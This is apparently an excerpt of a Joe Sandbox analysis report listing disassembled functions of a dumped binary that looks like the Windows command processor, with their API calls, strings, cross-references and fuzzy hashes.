Instruction Fuzzy Hash: F6A29731A08782C6EB149F65E4561B97BA1FF89B84F48813ADE4EA7794DF3CE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7E680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F809F4: iswspace.MSVCRT ref: 00007FF683F80A11
Part of subcall function 00007FF683F809F4: wcschr.MSVCRT ref: 00007FF683F80A2B

wcschr.MSVCRT ref: 00007FF683F7E71D
wcschr.MSVCRT ref: 00007FF683F7E738
_get_osfhandle.MSVCRT ref: 00007FF683F7E784
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F7E795
_wcsnicmp.MSVCRT ref: 00007FF683F7E7D5

Strings

=,;, xrefs: 00007FF683F7E713, 00007FF683F7E840, 00007FF683F7EBC0, 00007FF683F7EC0F
^, xrefs: 00007FF683F7EC69
:, xrefs: 00007FF683F7EB36
&<|>, xrefs: 00007FF683F7EC51
+: , xrefs: 00007FF683F7E731, 00007FF683F7EC33
:EOF, xrefs: 00007FF683F7E7CB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
String ID: &<|>$+: $:$:EOF$=,;$^
API String ID: 511550188-726566285
Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
Instruction ID: e857d8a9c60bc5fdbc4bb6a90bd44eb725acba451c00f5bdad461c35d46887ba
Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
Instruction Fuzzy Hash: 7A52A332A0C692C6EB648B15E406279AAF1FF59744F4C813ED94EA7794DF3CE445CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F79E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF683F79F25
_wcsnicmp.MSVCRT ref: 00007FF683F79F4A
_wcsnicmp.MSVCRT ref: 00007FF683F79F6F
_wcsnicmp.MSVCRT ref: 00007FF683F79F94
_wcsnicmp.MSVCRT ref: 00007FF683F79FB9
_wcsnicmp.MSVCRT ref: 00007FF683F79FDE
wcstol.MSVCRT ref: 00007FF683F7A02F
wcschr.MSVCRT ref: 00007FF683F7A2B1
wcschr.MSVCRT ref: 00007FF683F7A324
wcschr.MSVCRT ref: 00007FF683F7A367

Strings

tokens=, xrefs: 00007FF683F79FD7
delims=, xrefs: 00007FF683F79F87
usebackq, xrefs: 00007FF683F79F1B
eol=, xrefs: 00007FF683F79F62
skip=, xrefs: 00007FF683F79FAC
useback, xrefs: 00007FF683F79F3D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmp$wcschr$wcstol
String ID: delims=$eol=$skip=$tokens=$useback$usebackq
API String ID: 1738779099-3004636944
Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
Instruction ID: e7163d4a7a8a94b84f33a3dca0beec6ca8ef3158214ebb64ab4e6e29c59f1f80
Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
Instruction Fuzzy Hash: D4726B32B08692CAEB548F65D4466BD37B1BF44B88F4A8039DE0DB7794DE3CA855C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F97F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F97F44
_get_osfhandle.MSVCRT ref: 00007FF683F97F5C
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F97F9E
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F97FFF
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98020
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98036
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98061
RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98075
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F980D6
RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F980EA
_wcsnicmp.MSVCRT ref: 00007FF683F98177
_wcsnicmp.MSVCRT ref: 00007FF683F9819A
_wcsnicmp.MSVCRT ref: 00007FF683F981BD
_wcsnicmp.MSVCRT ref: 00007FF683F981DC
_wcsnicmp.MSVCRT ref: 00007FF683F981FB
_wcsnicmp.MSVCRT ref: 00007FF683F9821A
_wcsnicmp.MSVCRT ref: 00007FF683F98239
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98291
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F982D7
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F982FB
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F9831A
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98364
RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98378
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F9839A
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F983AE
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F983E6
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98403
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF683F98418

Strings

pushd , xrefs: 00007FF683F98232
chdir , xrefs: 00007FF683F981D5
rmdir , xrefs: 00007FF683F981F4
md , xrefs: 00007FF683F981B6
cd , xrefs: 00007FF683F98170
mkdir , xrefs: 00007FF683F98213
rd , xrefs: 00007FF683F98193

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 3637805771-3100821235
Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
Instruction ID: 1035802862507c47b97a0e1139102c66ca4b3fa0d03f712706c19a836ecd50b3
Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
Instruction Fuzzy Hash: DFE1A631B08652CAE7109F65E802579BBA1FF49B95F489239DD1EB37A0DF3CA445C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F73F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F74048
memset.MSVCRT ref: 00007FF683F7406E
memset.MSVCRT ref: 00007FF683F74094
memset.MSVCRT ref: 00007FF683F740BA

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F74492
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F745E0
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F74608
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F746DB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F746FA
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F74719
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F74738

Part of subcall function 00007FF683F75194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF683F751C4

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

Part of subcall function 00007FF683F8823C: FindFirstFileExW.KERNELBASE ref: 00007FF683F88280
Part of subcall function 00007FF683F8823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8829D

CopyFileW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF683F91DD5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F91DE7

Strings

%s, xrefs: 00007FF683F74254
%s , xrefs: 00007FF683F91982

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
String ID: %s$%s
API String ID: 3623545644-3518022669
Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
Instruction ID: 92c46fdcf08f7bd0cffa3c8f57ce63db0a02d30847635af00a086410174ac7b0
Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
Instruction Fuzzy Hash: CFD2B232A08682CAEB649F65E8526BD77A1FF45748F18413DDA0EA7B94DF3CE444C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F72C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F72CB6
memset.MSVCRT ref: 00007FF683F72CDA

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

wcsrchr.MSVCRT ref: 00007FF683F72E1F
memset.MSVCRT ref: 00007FF683F72ED4
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F72F36
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F72FA5
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7302C
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F73112
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F73131
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F90E96
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F90EBD
_wcsicmp.MSVCRT ref: 00007FF683F90F75
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F91065
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F91094
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F910AD
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F910BC
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F910CF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F910E0
_getch.MSVCRT ref: 00007FF683F910EC
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F91100
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F91113
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9115D
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9116F

Part of subcall function 00007FF683F83BAC: wcschr.MSVCRT ref: 00007FF683F83BE6

Strings

%s, xrefs: 00007FF683F73222, 00007FF683F90EE9
%9d, xrefs: 00007FF683F730B7, 00007FF683F90D21

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
String ID: %9d$%s
API String ID: 4286035211-3662383364
Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
Instruction ID: b4f7c1d5e7cdee4cfa0496127bcab8ff1ece3e37968078e158e26188bdbab628
Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
Instruction Fuzzy Hash: C052B232A08B82DAEB649F25D8512F977A0FF89748F48413ADA0EA7794DF3CD544C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F818D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF683F81949
towlower.MSVCRT ref: 00007FF683F819F6
wcsrchr.MSVCRT ref: 00007FF683F81A0C
wcsrchr.MSVCRT ref: 00007FF683F81A3F
wcsrchr.MSVCRT ref: 00007FF683F81A5A
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F81ADD

Strings

fdpnxsatz, xrefs: 00007FF683F81A05

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcsrchr$towlower
String ID: fdpnxsatz
API String ID: 3267374428-1106894203
Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
Instruction ID: 8fbd5e063cbfb2b0fed945c94af61910eaa923095f04d27c5b4a5fdca29388f0
Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
Instruction Fuzzy Hash: 8242D722B58682C6EF688F26D5152B967A1FF45B94F484539EE0EA7BC4DF3CE441C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F77650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F776E5

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_get_osfhandle.MSVCRT ref: 00007FF683F77745
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77759
_get_osfhandle.MSVCRT ref: 00007FF683F7776C
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F77783
_get_osfhandle.MSVCRT ref: 00007FF683F777A3
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F777C9
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F77808
wcsrchr.MSVCRT ref: 00007FF683F949BE
_wcsnicmp.MSVCRT ref: 00007FF683F94A02
SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F94A81

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

Strings

DPATH, xrefs: 00007FF683F9499A

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
String ID: DPATH
API String ID: 95024817-2010427443
Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction ID: 72eecc004b00313fe1cb898cc2ec54ce59df19f70c50c436f45bbaa896edba85
Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
Instruction Fuzzy Hash: 8612C632A18682CAEB64DF15A4011B9B7A1FF99754F48523DEE4EA7794DF3CE404CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F75240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON

Download Yara Rule

Strings

[...], xrefs: 00007FF683F93013
[.], xrefs: 00007FF683F93128
..., xrefs: 00007FF683F92C8C
[..], xrefs: 00007FF683F92FB5
:, xrefs: 00007FF683F93261

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
Instruction ID: 0956ae23d586bb08aae2a7f43d6e88c004e8fac839c592bcd10b2fa2515315be
Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
Instruction Fuzzy Hash: FF327972A08682CAEB20DF25E9462F973A0FF45788F49413ADE0DA7695DF3CE545C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F76EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON

Download Yara Rule

APIs

GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF683F76F34
SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F76F49
FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F76F5F
FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0 ref: 00007FF683F76F74
realloc.MSVCRT ref: 00007FF683F94327

Part of subcall function 00007FF683F85508: GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF683F76F97), ref: 00007FF683F8550C

GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F76FA8
memmove.MSVCRT ref: 00007FF683F7702F
GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0 ref: 00007FF683F77064

Strings

%s %s , xrefs: 00007FF683F94400
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, xrefs: 00007FF683F76EEB
%02d%s%02d%s%02d, xrefs: 00007FF683F94355
%s , xrefs: 00007FF683F943ED

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
API String ID: 4111365348-3662956551
Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
Instruction ID: 38ba17061e7f6872916efc233de74f62ee9eadc12780d1f31d3f74084550f948
Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
Instruction Fuzzy Hash: 75E1CF62A18642C6EB54DF65A8425F967A1FF48788F8C413ADD0EF7694EF3CE505C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_wcsupr.MSVCRT ref: 00007FF683F9EF33
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EF98
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFA9
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFBF
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF683F9EFDC
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9EFED
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F003
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F022
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF683F9E964), ref: 00007FF683F9F083
